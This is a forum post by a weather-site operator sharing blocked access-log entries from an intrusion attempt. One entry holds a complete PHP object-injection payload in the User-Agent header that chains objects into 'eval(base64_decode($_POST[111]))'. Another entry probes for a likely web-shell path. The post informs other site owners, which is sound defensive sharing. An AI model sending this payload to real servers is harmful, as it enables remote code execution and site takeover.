Author Topic: Interesting server log this morning  (Read 375 times)

0 Members and 1 Guest are viewing this topic.

Offline sacreyweather

  • Echo Valley Weather
  • Forecaster
  • *****
  • Posts: 1728
    • Echo Valley Weather
Interesting server log this morning
« on: January 30, 2019, 11:24:02 AM »
Came across these lines this morning while looking my logs over:

185.234.217.204 - - [30/Jan/2019:07:20:49 -0500] "GET / HTTP/1.1" 403 724 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" 0 0 "off:-:-" 163 87439 192.252.144.23 salineweather.com
185.234.217.204 - - [30/Jan/2019:07:20:51 -0500] "GET / HTTP/1.1" 403 724 "-" "}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:4:\"\\0\\0\\0a\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:5:\"cache\";b:1;s:19:\"cache_name_function\";s:6:\"assert\";s:10:\"javascript\";i:9999;s:8:\"feed_url\";s:54:\"eval(base64_decode($_POST[111]));JFactory::get();exit;\";}i:1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";i:1;}\xf0\x9d\x8c\x86" 0 0 "off:-:-" 508 107208 192.252.144.23 salineweather.com
185.234.217.204 - - [30/Jan/2019:07:20:54 -0500] "POST / HTTP/1.1" 403 724 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" 0 0 "off:-:-" 994 88448 192.252.144.23 salineweather.com
185.234.217.204 - - [30/Jan/2019:07:20:54 -0500] "GET /libraries/sfn.php HTTP/1.1" 403 724 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" 0 0 "off:-:-" 180 100350 192.252.144.23 salineweather.com

IP is out of Ireland, and yes it has a 403 on it already because of some earlier activity from this IP, but I found it interesting as to what they were attempting to do, and thought I would share for others to see.


John
CWOP: D2073, GR2AE, GR3, Cumulus, PWSweather,  CoCoRaHS: AR-SL-23  

Saline Weather on Twitter
Blitzortung Station 1387